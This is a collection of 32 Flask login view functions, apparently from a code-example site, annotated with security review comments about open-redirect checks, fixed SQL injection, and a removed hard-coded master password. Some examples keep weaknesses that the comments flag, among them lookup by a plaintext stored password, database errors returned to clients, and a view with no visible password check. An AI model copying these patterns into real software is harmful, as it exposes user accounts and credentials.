Exemplo n.º 1
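def login_form():
    """
    Show the login form and process a submitted login.

    An already authenticated user is redirected to the index page. A
    ``next`` query parameter is remembered in the session only when it is a
    same-site path. Unknown address and wrong password flash the same
    message, so the response does not reveal which addresses are registered.
    """

    if current_user.is_authenticated:
        return redirect(url_for('index'))

    next_page = request.args.get('next')

    # "next" is caller-controlled. An empty netloc alone is not sufficient:
    # a value beginning "/\" parses without a netloc but browsers resolve it
    # to another host, so a single leading "/" is required as well.
    if (next_page
            and next_page.startswith('/')
            and not next_page.startswith(('//', '/\\'))
            and url_parse(next_page).netloc == ''):
        session['next_page'] = next_page

    if request.method == 'GET':
        return response(render('auth/login.html'))

    loginform = LoginForm()

    if not loginform.validate():
        flash(loginform.errors, category='form_error')
        return failed_login()

    user = User.by_email_address(loginform.email_id.data)

    # One message for both failure modes prevents account enumeration.
    # NOTE(review): no hash is computed when the user is unknown, so response
    # time may still differ between the two cases.
    if user is None or not user.check_password(loginform.password.data):
        flash('Invalid email address or password', 'login_info')
        return failed_login()

    return _login(user, loginform.remember_me.data)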
Exemplo n.º 2
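def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is logged in with a persistent "remember me" cookie
    and redirected to a same-site ``next`` path, or to ``web.index`` when
    ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            # remember=True stores a persistent cookie (365 days by default);
            # without it the cookie only lasts for the browser session.
            login_user(user, remember=True)
            target = request.args.get("next")
            # Fixed: the method is str.startswith; "startwith" raised
            # AttributeError on every request that carried ?next=.
            # A leading "//" or "/\" also starts with "/" but is resolved by
            # browsers as another host, so those are rejected too.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.index')
            return redirect(target)  # the view must return for the redirect to happen

            # Flask-Login setup notes kept from the original author:
            # login_user stores the identity returned by the model's get_id():
            #     def get_id(self):
            #         return self.id
            # Inheriting flask_login.UserMixin provides get_id already, as long
            # as the model's unique identifier is the "id" field:
            #     class User(Base, UserMixin):
            #
            # Three pieces are needed at initialisation:
            #     login_manager = LoginManager()
            #
            #     @login_manager.user_loader
            #     def load_user(user_id):
            #         user = db.session.query(User).get(user_id)
            #         return user
            #
            #     def create_app():
            #         app = Flask(__name__)
            #         register_blueprint(app)
            #         login_manager.init_app(app)

        else:
            flash("账号不存在或者密码错误")
    return render_template('auth/login.html',form=form)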
Exemplo n.º 3
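def login():
    """
    Authenticate a JSON login request.

    The request body is a JSON object carrying the LoginForm fields. On
    success the user is logged in and a JSON string with code 200 plus the
    user's id, nickname and group id is returned. Wrong credentials and form
    validation errors both return ``LoginFailed``.

    The previous version also accepted one hard-coded password for every
    account. That branch is removed: only the account's own password is
    accepted. If that literal was ever deployed, review access logs for
    logins that used it.
    """
    data = json.loads(request.data)
    form = LoginForm(MultiDict(data))

    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(nickname=form.nickname.data).first()
        if user and user.check_password(form.password.data):
            # Writes the user's identity into the login cookie.
            login_user(user, remember=True)
            result = {'code': 200, 'user_id': user.id, 'nickname': user.nickname, 'groupid': user.groupid}
            return json.dumps(result)
        # Same answer for an unknown nickname and a wrong password.
        return LoginFailed(msg='用户名或密码错误')

    # Form validation failed: report the first error of every field.
    msg = ''.join(errors[0] + ' ' for errors in form.errors.values())
    return LoginFailed(msg=msg)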
Exemplo n.º 4
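def login():
    """
    Authenticate a form login against the ``vuser`` table and answer in JSON.

    Returns code 200 on success and code -1 with an ``errMsg`` on any
    failure. The lookup uses a bound parameter, and an unknown email gets
    the same message as a wrong password.
    """
    form = LoginForm(request.form)
    if not form.validate():
        return jsonify({"code": -1, "errMsg": form.errors})

    db = pymysql.connect(host=current_app.config['HOST'],
                         user=current_app.config['USER'],
                         password=current_app.config['PASSWORD'],
                         port=current_app.config['PORT'],
                         database=current_app.config['DATABASE'],
                         charset=current_app.config['CHARSET'])
    cursor = db.cursor()

    # SQL lookup. The email is passed as a bound parameter; building the
    # statement with "%" string formatting let the submitted value change
    # the query itself (SQL injection).
    sql = "SELECT * FROM vuser WHERE email = %s"
    try:
        cursor.execute(sql, (form.data['email'],))
        user = cursor.fetchone()
        # fetchone() returns None when no row matches; len(None) used to
        # raise and fall into the generic handler below.
        if not user:
            return jsonify({"code": -1, "errMsg": "账号或密码输入错误"})
        userObject = User()
        userObject.set_attr(user, 0)
        if check_password_hash(userObject.password, form.data['password']):
            login_user(userObject)
            return jsonify({"code": 200, "Msg": "登录成功"})
        return jsonify({"code": -1, "errMsg": "账号或密码输入错误"})
    except Exception as e:
        # NOTE(review): e.args can carry database error text to the client;
        # consider logging it server-side and returning a generic message.
        return jsonify({"code": -1, "errMsg": e.args})
    finally:
        # Record the call and close the database connection on every path.
        send_log('/v1/auth/login')
        db.close()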
Exemplo n.º 5
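def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        # Not: user.password == generate_password_hash(form.password.data)
        if user and user.check_password(form.password.data):
            # The login "ticket" (cookie) is written here by Flask-Login.
            # Docs: http://www.pythondoc.com/flask-login/
            # remember=True keeps the user logged in across browser sessions;
            # REMEMBER_COOKIE_DURATION sets how long (default 365 days).
            # login_user also accepts a duration keyword for a single login:
            #     import datetime
            #     duration = datetime.timedelta(seconds=30)  # 30 seconds
            #     login_user(user, remember=True, duration=duration)
            login_user(user, remember=True)
            target = request.args.get('next')
            # Requiring a leading "/" stops redirects to other sites, e.g.
            # http://127.0.0.1:81/login?next=http://www.qq.com
            # A leading "//" or "/\" also starts with "/" but is resolved by
            # browsers as another host, so those are rejected as well.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.index')
            return redirect(target)
        else:
            flash('用户名或密码错误')
    return render_template('auth/login.html', form=form)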
Exemplo n.º 6
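def login():
    """
    Sign a user in with email and password.

    Authenticated users go straight to the dashboard. Bad credentials
    re-render the form with HTTP 401 and one message for both an unknown
    address and a wrong password. After login the user is redirected to a
    same-site ``next`` path, or to the dashboard.
    """
    if current_user.is_authenticated:
        return redirect(url_for("main.dashboard"))

    form = LoginForm()
    if form.validate_on_submit():
        user = get_user_by_email(form.email.data)

        if user is None or not bcrypt.check_password_hash(
            user.password, form.password.data
        ):
            flash("Invalid email address or password")
            return render_template("auth/login.html", title="Sign In", form=form), 401

        login_user(user)
        session["user_name"] = user.name
        session["user_id"] = user.id
        # NOTE(review): this copy of is_admin goes stale if the role changes
        # during the session; authorization checks should read the current
        # user record rather than the session value.
        session["is_admin"] = user.is_admin
        next_page = request.args.get("next")
        # An empty netloc alone is not sufficient: a value beginning "/\"
        # parses without a netloc but browsers resolve it to another host.
        if (not next_page
                or not next_page.startswith("/")
                or next_page.startswith(("//", "/\\"))
                or url_parse(next_page).netloc != ""):
            next_page = url_for("main.dashboard")

        flash("You have been logged in", "success")
        return redirect(next_page)

    return render_template("auth/login.html", form=form)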
Exemplo n.º 7
def re_authenticate():
    """
    Ask a logged-in user for their password again to refresh the session.

    A session that is already fresh is sent to the main index. Otherwise the
    login form is shown until the current user's password validates.
    """
    # Flask-Login's login_fresh() is true when the session comes from an
    # actual login rather than being restored from a "remember me" cookie.
    if login_fresh():
        return redirect(url_for('main.index'))

    form = LoginForm()
    password_ok = (form.validate_on_submit()
                   and current_user.validate_password(form.password.data))
    if not password_ok:
        return render_template('auth/login.html', form=form)

    # confirm_login() marks the current session as fresh again.
    confirm_login()
    # NOTE(review): redirect_back() is defined elsewhere; how it validates
    # its target is not visible here.
    return redirect_back()
Exemplo n.º 8
def login():
    """
    Log a user in by (lower-cased) email and password.

    The same warning is flashed for an unknown email and a wrong password.
    """
    form = LoginForm()
    if not form.validate_on_submit():
        return render_template('auth/login.html', form=form)

    account = User.query.filter_by(email=form.email.data.lower()).first()
    if account and account.validate_password(form.password.data):
        login_user(account, form.remember_me.data)
        flash('Login Success.', 'info')
        # NOTE(review): redirect_back() is defined elsewhere; how it
        # validates its target is not visible here.
        return redirect_back()

    flash('Invalid email or password.', 'warning')
    return render_template('auth/login.html', form=form)
Exemplo n.º 9
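def login():
    '''auth.login()

    Authenticate an active account with failed-attempt accounting.

    Only accounts that are created, activated and not deleted are looked up.
    A locked account is refused before the password is checked. A wrong
    password increments the invalid-login counter and, once the account
    becomes locked, notifies the user managers by email. After login the
    user is redirected to a same-site ``next`` path or to their index URL.
    '''
    # "next" comes from the query string, so it is accepted only as a
    # same-site path. A leading "//" or "/\" also starts with "/" but is
    # resolved by browsers as another host.
    next_url = request.args.get('next')
    if (not next_url or not next_url.startswith('/')
            or next_url.startswith(('//', '/\\'))):
        next_url = None
    if current_user.is_authenticated:
        return redirect(next_url or current_user.index_url)
    form = LoginForm()
    if form.validate_on_submit():
        user = User.query.filter_by(
            email=form.email.data.strip().lower(),
            created=True,
            activated=True,
            deleted=False
        ).first()
        if user is not None:
            if not user.locked:
                if user.verify_password(form.password.data):
                    user.reset_invalid_login_count()
                    db.session.commit()
                    login_user(user, remember=form.remember_me.data)
                    if user.plays('协管员'):
                        send_email(
                            recipient=user.email,
                            subject='登录提醒',
                            template='auth/mail/login',
                            user=user,
                            timestamp=datetime_now(utc_offset=current_app.config['UTC_OFFSET'])
                        )
                    get_announcements(type_name='登录通知', flash_first=True)
                    add_user_log(user=user, event='登录系统', category='access')
                    return redirect(next_url or user.index_url)
                user.increase_invalid_login_count()
                db.session.commit()
                if user.locked:
                    send_emails(
                        recipients=[staff.email for staff in User.all_can('管理用户').all()
                                    if staff.has_inner_domain_email],
                        subject='锁定用户:{}'.format(user.name_email),
                        template='auth/mail/lock_user',
                        user=user
                    )
                flash('登录失败:密码错误(第{}次)'.format(user.invalid_login_count), category='error')
                # NOTE(review): X-Forwarded-For is supplied by the client
                # unless a trusted proxy overwrites it, so the source written
                # to the access log can be forged.
                add_user_log(user=user, event='登录失败:密码错误(第{}次,来源:{})'.format(
                    user.invalid_login_count,
                    get_geo_info(
                        ip_address=request.headers.get('X-Forwarded-For', request.remote_addr),
                        show_ip=True
                    )
                ), category='access')
                return redirect(url_for('auth.login'))
            flash('登录失败:您的账户已被锁定', category='error')
            return redirect(url_for('auth.login'))
        # NOTE(review): the three failure messages differ, which tells the
        # caller whether an address belongs to an active account.
        flash('登录失败:无效的用户名或密码', category='error')
    return minify(render_template(
        'auth/login.html',
        form=form
    ))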
Exemplo n.º 10
def login():
    """
    Log in the user named by the submitted form and redirect.

    When the form is not a valid submission the home page is rendered with
    the login and registration forms.
    """
    form = LoginForm(**request.form)
    if not form.validate_on_submit():
        return render_template('home/index.html',
                               login_form=form,
                               registration_form=RegistrationForm(),
                               js_vars={'invalidFormButton': 'login-btn'})

    # NOTE(review): no password check is visible in this view; presumably
    # LoginForm's validators verify the credentials and that the account
    # exists. Confirm, because login_user() runs unconditionally here.
    account = User.query.filter_by(email=form.email.data).first()
    login_user(account, remember=form.remember.data)

    # NOTE(review): "next" is used as an endpoint name and comes from the
    # query string; url_for() fails on a name that is not a registered
    # endpoint. Consider checking it against a fixed set of endpoints.
    endpoint = request.args.get('next', 'home.index')
    return redirect(url_for(endpoint))
Exemplo n.º 11
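def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    The email and the password are matched against the same row. The earlier
    version ran two independent queries, so any existing email was accepted
    together with a password that belonged to any account.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        # NOTE(review): filtering on the password column implies passwords
        # are stored as submitted. Store a salted hash and verify it on the
        # loaded user instead; that needs a model change outside this view.
        user = User.query.filter_by(email=form.email.data,
                                    password=form.password.data).first()
        if user:
            # Keep the user logged in across browser sessions.
            login_user(user, remember=True)
            return redirect(url_for('web.mainpage'))
        else:
            flash("账号不存在或密码错误")
    return render_template('auth/login.html', form=form)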
Exemplo n.º 12
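def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path. When
    ``next`` is missing or not a local path the site root is used.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            login_user(user, remember=True)
            target = request.args.get('next')
            # "next" comes from the query string and was passed to
            # redirect() unchecked (and as None when absent). Accept only a
            # same-site path; a leading "//" or "/\" is resolved by browsers
            # as another host. The site root is the fallback because this
            # view names no landing endpoint.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = '/'
            return redirect(target)
        else:
            flash('账号不存在或密码错误')
    return render_template('auth/login.html', form=form)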
Exemplo n.º 13
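def login():
    """
    Log a user in by username and password.

    Accounts without a local password hash (third-party logins) are sent
    back to the login page. On success the user is redirected to a
    same-site ``next`` path, or to ``web.index``.
    """
    form = LoginForm()
    if form.validate_on_submit():
        user = User.query.filter_by(username=form.username.data).first()
        # first() returns None for an unknown username; reading
        # password_hash on it used to raise before any message was shown.
        if user is not None and not user.password_hash:
            flash('该账号为第三方登录账号,请重新登录', 'warning')
            return redirect(url_for('.login'))
        if user and user.verify_password(form.password.data):
            login_user(user)
            target = request.args.get('next')
            # Accept "next" only as a same-site path; a leading "//" or
            # "/\" is resolved by browsers as another host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.index')
            return redirect(target)
        flash('密码错误', 'warning')
    return render_template('user_login.html', form=form)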
Exemplo n.º 14
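def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            login_user(user)
            target = request.args.get('next')
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            is_local = (bool(target) and target.startswith('/')
                        and not target.startswith(('//', '/\\')))
            if not is_local:
                target = url_for('web.index')
            return redirect(target)
        else:
            flash('账号不存在或密码错误')
    return render_template('auth/login.html', form=form)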
Exemplo n.º 15
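def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == "POST" and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            login_user(user)
            jump_page = request.args.get("next")
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            if (not jump_page or not jump_page.startswith("/")
                    or jump_page.startswith(("//", "/\\"))):
                return redirect(url_for("web.index"))
            return redirect(jump_page)
        else:
            flash(message="用户不存在,请重新输入")
    return render_template("auth/login.html", form=form)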
Exemplo n.º 16
 def login_view(self):
     """
     Handle the login form of this view.

     A valid POST with matching credentials logs the user in; a mismatch
     flashes an error. Any authenticated user is then redirected to
     ``.index``; otherwise the form is handed to the parent index view.
     """
     form = LoginForm(request.form)
     submitted = request.method == 'POST' and form.validate()
     if submitted:
         account = User.query.filter_by(email=form.email.data).first()
         if not (account and account.check_password(form.password.data)):
             # Same message for an unknown account and a wrong password.
             flash('账号不存在或密码错误')
         else:
             login_user(account, remember=True)
     if current_user.is_authenticated:
         return redirect(url_for('.index'))
     self._template_args['form'] = form
     return super(MyView, self).index()
Exemplo n.º 17
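def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            login_user(user, remember=True)
            # e.g. http://127.0.0.1:8080/login?next=%2Fmy%2Fgifts
            # The value after "next=" is read here and must be checked
            # before it is used as a redirect target.
            target = request.args.get('next')
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.index')
            return redirect(target)
        else:
            flash('账号不存在或密码错误')
    return render_template('auth/login.html', form=form)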
Exemplo n.º 18
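def login():
    """
    Render the login page and authenticate a submitted nickname/password.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.search`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == "POST" and form.validate():
        data = form.data
        user = User.query.filter_by(nickname=data["nickname"]).first()
        if user and user.check_password(data["password"]):
            login_user(user, remember=True)
            next_url = request.args.get("next")
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            if (not next_url or not next_url.startswith("/")
                    or next_url.startswith(("//", "/\\"))):
                next_url = url_for("web.search")
            return redirect(next_url)
        # Same message for an unknown nickname and a wrong password.
        flash("账号或密码错误")
    return render_template("auth/login.html", form=form)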
Exemplo n.º 19
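def login():
    """
    Render the login page and authenticate a submitted username/password.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.autoscan`` when ``next`` is missing or not a local path.
    """
    # NOTE(review): the form receives the request object itself rather than
    # request.form; confirm LoginForm is written to accept that.
    form = LoginForm(request)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(username=form.username.data).first()
        if user and user.check_password(form.password.data):
            login_user(user, remember=True)
            target = request.args.get('next')
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.autoscan')
            return redirect(target)
        else:
            flash('账号不存在或密码错误', category='login_error')
    return render_template('auth/login.html', form=form)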
Exemplo n.º 20
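def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            # remember=True writes a persistent "remember me" cookie, not a
            # session-only one.
            login_user(user, remember=True)
            target = request.args.get('next')
            # To prevent redirects to other sites, anything that is not a
            # local path is replaced by the home page. "//" and "/\" also
            # start with "/" but are resolved by browsers as another host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                # url_for takes the endpoint name of the view function.
                target = url_for('web.index')
            return redirect(target)  # without return no redirect is sent
        else:
            flash('账号不存在或密码错误')
    return render_template('auth/login.html', form=form)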
Exemplo n.º 21
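def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            login_user(user, remember=True)
            # URL of the page that was open before the login page.
            target = request.args.get('next')
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.index')
            return redirect(target)
        else:
            flash('Email address does not exist or password does not match.')
    return render_template('auth/login.html', form=form)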
Exemplo n.º 22
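def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            login_user(user, remember=True)

            target = request.args.get('next')
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                return redirect(url_for('web.index'))
            return redirect(target)
        else:
            flash("账号不存在或者密码错误")
    return render_template('auth/login.html', form=form)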
Exemplo n.º 23
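def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        # Check that the submitted password matches.
        if user and user.check_password(form.password.data):
            # login_user writes the login "ticket" into a cookie;
            # remember controls whether it is kept for a period of time.
            login_user(user, remember=True)
            # Return to the address given in next=, i.e. the page that
            # required the login.
            target = request.args.get('next')
            # The path check prevents redirects to other sites. "//" and
            # "/\" also start with "/" but are resolved by browsers as
            # another host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.index')
            return redirect(target)
        else:
            flash('账号不存在或密码错误', category='login_error')
    return render_template('auth/login.html', form=form)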
Exemplo n.º 24
def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    After login the user is redirected to the endpoint named by ``next``,
    or to ``admin.index`` / ``student.index`` depending on ``is_staff``.
    """
    form = LoginForm(request.form)
    if not (request.method == 'POST' and form.validate()):
        return render_template('auth/login.html', form=form)

    account = User.query.filter_by(email=form.email.data).first()
    if not account or not account.check_password(form.password.data):
        flash("用户不存在或密码错误")
        return render_template('auth/login.html', form=form)

    user_prefix = "admin" if account.is_staff else "student"
    login_user(account, remember=True)
    endpoint = request.args.get("next")
    # NOTE(review): debug output of a caller-supplied value; consider
    # removing it or using the application logger.
    print(endpoint)
    if not endpoint:
        endpoint = f"{user_prefix}.index"
    # NOTE(review): "next" is used as an endpoint name and comes from the
    # query string; url_for() fails on a name that is not a registered
    # endpoint, and Flask-Login normally puts a URL path in "next".
    return redirect(url_for(endpoint))
Exemplo n.º 25
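def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)  # request.form holds the submitted form fields
    if request.method == 'POST' and form.validate():
        # Look up the submitted user.
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            # login_user requires the User model to inherit UserMixin; it
            # stores the login "ticket" in a cookie.
            login_user(user)
            # request.args holds the parameters after "?" in the URL; a
            # redirect from a page that requires login carries "next".
            target = request.args.get('next')
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.index')
            return redirect(target)

        else:
            flash('账号不存在或密码错误')
    return render_template('auth/login.html',form=form)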
Exemplo n.º 26
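def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            # Write the user's identity into the login cookie.
            login_user(user, remember=True)
            target = request.args.get('next')
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            if (not target or not target.startswith("/")
                    or target.startswith(("//", "/\\"))):
                target = url_for('web.index')
            return redirect(target)
        else:
            flash("账号密码不正确!")
    return render_template('auth/login.html', form=form)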
Exemplo n.º 27
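def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            login_user(user, remember=True)  # writes the login ticket to a cookie
            nex = request.args.get('next')  # args holds the URL query parameters
            # The path check was only described in a comment before, so any
            # URL in "next" was followed. Accept a same-site path only; "//"
            # and "/\" also start with "/" but are resolved by browsers as
            # another host.
            if (not nex or not nex.startswith('/')
                    or nex.startswith(('//', '/\\'))):
                nex = url_for('web.index')
            return redirect(nex)

        else:
            flash('账户不存在或者密码错误')
    return render_template('auth/login.html', form=form)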
Exemplo n.º 28
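def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)

    if request.method == "POST" and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            login_user(user, remember=True)
            next_url = request.args.get('next')
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            if (not next_url or not next_url.startswith('/')
                    or next_url.startswith(('//', '/\\'))):
                next_url = url_for("web.index")
            return redirect(next_url)
        else:
            flash("Invalid username or password.")
    return render_template('auth/login.html', form=form)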
Exemplo n.º 29
def login():
    """
    Log a user in by email and password, then go to the main index.

    Authenticated users are redirected immediately. The redirect target is
    fixed, so no request parameter influences it. Failed attempts flash one
    generic message.
    """
    if current_user.is_authenticated:
        return redirect(url_for('main.index'))

    form = LoginForm()
    page = lambda: render_template('views/auth/login.html', title='Login', form=form)

    if not form.validate_on_submit():
        return page()

    account = User.query.filter_by(email=form.email.data).first()
    if account is None or not account.check_password(form.password.data):
        flash('Login Failed', 'danger')
        return page()

    login_user(account, remember=form.remember_me.data)
    return redirect(url_for('main.index'))
Exemplo n.º 30
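def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            # Logging in works by writing the user's identity to a cookie.
            login_user(user, remember=True)
            # The URL that required login is carried in the "next" parameter.
            target = request.args.get('next')
            # A leading "/" alone is not enough: "//" and "/\" also start
            # with "/" but are resolved by browsers as another host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.index')
            return redirect(target)
        else:
            flash('账号不存在或密码错误', category='login_error')
    return render_template('auth/login.html', form=form)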
Exemplo n.º 31
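def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.main`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == "POST" and form.validate():
        email = form.email.data
        password = form.password.data
        user = User.query.filter_by(email=email).first()
        if user and user.check_password(password):
            login_user(user)
            target = request.args.get('next')
            # Fixed an inverted test: local paths were being replaced by the
            # default while every other value was followed as given. Only a
            # same-site path is kept now; "//" and "/\" also start with "/"
            # but are resolved by browsers as another host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.main')
            return redirect(target)
        else:
            flash("密码错误!")
    return render_template('auth/login.html', form=form)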
Exemplo n.º 32
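def login():
    """
    Render the login page and authenticate a submitted email/password pair.

    On success the user is redirected to a same-site ``next`` path, or to
    ``web.index`` when ``next`` is missing or not a local path.
    """
    form = LoginForm(request.form)
    if request.method == 'POST' and form.validate():
        user = User.query.filter_by(email=form.email.data).first()
        if user and user.check_password(form.password.data):
            # The remember cookie lasts 365 days by default.
            login_user(user, remember=True)
            # After login, go back to the page the user came from.
            target = request.args.get('next')
            # Reject values that would redirect off-site. "//" and "/\"
            # also start with "/" but are resolved by browsers as another
            # host.
            if (not target or not target.startswith('/')
                    or target.startswith(('//', '/\\'))):
                target = url_for('web.index')
            return redirect(target)
        else:
            flash('账号不存在或密码错误')

    # The form is passed to the template so field values and validation
    # errors can be rendered; the call previously passed no context.
    return render_template('auth/login.html', form=form)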